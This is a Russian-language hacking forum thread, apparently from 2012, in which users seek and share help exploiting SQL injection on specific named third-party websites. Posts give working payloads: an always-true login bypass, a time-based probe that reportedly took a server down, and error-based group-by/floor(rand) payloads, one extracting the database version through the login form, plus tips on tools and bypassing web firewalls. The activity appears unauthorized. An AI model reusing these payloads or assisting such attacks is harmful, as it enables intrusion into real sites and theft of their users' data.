27.11.2012, 19:09
|
|
Новичок
Регистрация: 13.10.2011
Сообщений: 4
С нами:
7674806
Репутация:
0
|
|
помогите, тут есть инъекция
Код:
http://sdelanounas.ru/blogs/all/?page=-1
если есть то как раскрутить
+ ещё
Код:
http://sdelanounas.ru/blogs/21928/?pid=-185629
|
|
|
27.11.2012, 23:34
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами:
9176038
Репутация:
8
|
|
Сообщение от MorganFr
помогите, тут есть инъекция
Код:
http://sdelanounas.ru/blogs/all/?page=-1
если есть то как раскрутить You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-20, 20' at line 8
Тут инъекция в LIMIT
C учётом того, что в запросе присутствует ORDER BY провести инъекцию неполучится.
|
|
|
|
28.11.2012, 03:07
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
С нами:
8417113
Репутация:
0
|
|
Сообщение от BigBear
Тут инъекция в LIMIT
Там нет инъекции.
|
|
|
|
28.11.2012, 11:33
|
|
Новичок
Регистрация: 13.10.2011
Сообщений: 4
С нами:
7674806
Репутация:
0
|
|
Сообщение от BigBear
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-20, 20' at line 8
Тут инъекция в LIMIT
C учётом того, что в запросе присутствует ORDER BY провести инъекцию неполучится.
Спасибо, а вот тут такого рода ошибку нашёл, это тоже самое?
Код:
http://www.sdelanounas.ru/index/loginPage/
Если в поле логин ввести одинарную ковычку ' и любой пароль, то выводит ошибку:
Код:
SELECT * FROM users WHERE login=#user AND (domain="sdelanounas.ru" OR (domain != "sdelanounas.ru" AND crossdomain = 1)) You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''ggh'' AND (domain="sdelanounas.ru" OR (domain != "sdelanounas.ru" AND crossdoma' at line 1
Пробовал в Haviji POST запросом, ничего не вышло.
|
|
|
|
28.11.2012, 13:12
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами:
9176038
Репутация:
8
|
|
Сообщение от MorganFr
Спасибо, а вот тут такого рода ошибку нашёл, это тоже самое?
Код:
http://www.sdelanounas.ru/index/loginPage/
Если в поле логин ввести одинарную ковычку ' и любой пароль, то выводит ошибку: Подозреваю что тут инъекция точно присутствует.
Во всяком случае при использовании ' or 1='1 сервер не ругался.
Так как вывода нет, решил попробовать Time-Based SQL, но sleep(2) отправил сервер в даун... Теперь жду пока оживёт
З.Ы. Забудь про HAVIJ - он не обойдёт за тебя WAF и не определит фильтры. Его можно юзать как дампер, когда полностью готов вектор атаки и есть все данные, но не как "Утилиту для авто-похека".
|
|
|
|
28.11.2012, 13:39
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
С нами:
9384053
Репутация:
303
|
|
Добрый. Суть: при выборке вида -> +or+1+group+by+concat( (select+user()+from+web-blog.wp_users+limit+0,1),floor(rand(0)*2)) having min(0)--+ , плюется во так : right syntax to use near '-blog.wp_users. Те, крашится на дефисе в названии базы. Мысли?
|
|
|
|
28.11.2012, 16:43
|
|
Новичок
Регистрация: 21.12.2009
Сообщений: 0
С нами:
8625634
Репутация:
0
|
|
Сообщение от Cennarios
Добрый. Суть: при выборке вида -> +or+1+group+by+concat( (select+user()+from+web-blog.wp_users+limit+0,1),floor(rand(0)*2)) having min(0)--+ , плюется во так : right syntax to use near '-blog.wp_users. Те, крашится на дефисе в названии базы. Мысли?
`web-blog`.wp_users
|
|
|
|
28.11.2012, 17:43
|
|
Новичок
Регистрация: 13.10.2011
Сообщений: 4
С нами:
7674806
Репутация:
0
|
|
Сообщение от MorganFr
Спасибо, а вот тут такого рода ошибку нашёл, это тоже самое?
Код:
http://www.sdelanounas.ru/index/loginPage/
Если в поле логин ввести одинарную ковычку ' и любой пароль, то выводит ошибку:
Код:
SELECT * FROM users WHERE login=#user AND (domain="sdelanounas.ru" OR (domain != "sdelanounas.ru" AND crossdomain = 1)) You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''ggh'' AND (domain="sdelanounas.ru" OR (domain != "sdelanounas.ru" AND crossdoma' at line 1
Пробовал в Haviji POST запросом, ничего не вышло.
Сообщение от BigBear
Подозреваю что тут инъекция точно присутствует.
Во всяком случае при использовании ' or 1='1 сервер не ругался.
Так как вывода нет, решил попробовать Time-Based SQL, но sleep(2) отправил сервер в даун... Теперь жду пока оживёт
З.Ы. Забудь про HAVIJ - он не обойдёт за тебя WAF и не определит фильтры. Его можно юзать как дампер, когда полностью готов вектор атаки и есть все данные, но не как "Утилиту для авто-похека".
не получилось у меня в ручную ничего сделать, знаний не хватает. Может кто поможет, мне даже не важен хеш админа, но очень нужно раскрытие полного пути к скрипту.
|
|
|
|
28.11.2012, 18:26
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами:
8328566
Репутация:
935
|
|
Сообщение от MorganFr
Спасибо, а вот тут такого рода ошибку нашёл, это тоже самое?
Код:
http://www.sdelanounas.ru/index/loginPage/
Если в поле логин ввести одинарную ковычку ' и любой пароль, то выводит ошибку:
Код:
SELECT * FROM users WHERE login=#user AND (domain="sdelanounas.ru" OR (domain != "sdelanounas.ru" AND crossdomain = 1)) You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''ggh'' AND (domain="sdelanounas.ru" OR (domain != "sdelanounas.ru" AND crossdoma' at line 1
Пробовал в Haviji POST запросом, ничего не вышло. login=' or(1)group by(concat(version(),0x00,floor(rand(0)*2)))having( min(0)or(1))#
password=1
Duplicate entry '5.0.51a-24+lenny5-log' for key 1
|
|
|
|
28.11.2012, 20:27
|
|
Познающий
Регистрация: 03.05.2011
Сообщений: 30
С нами:
7909526
Репутация:
1
|
|
m.gortransperm.ru/time-table/12+order+by+1/13403 pgsql , order by 1 с ошибкой?!
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
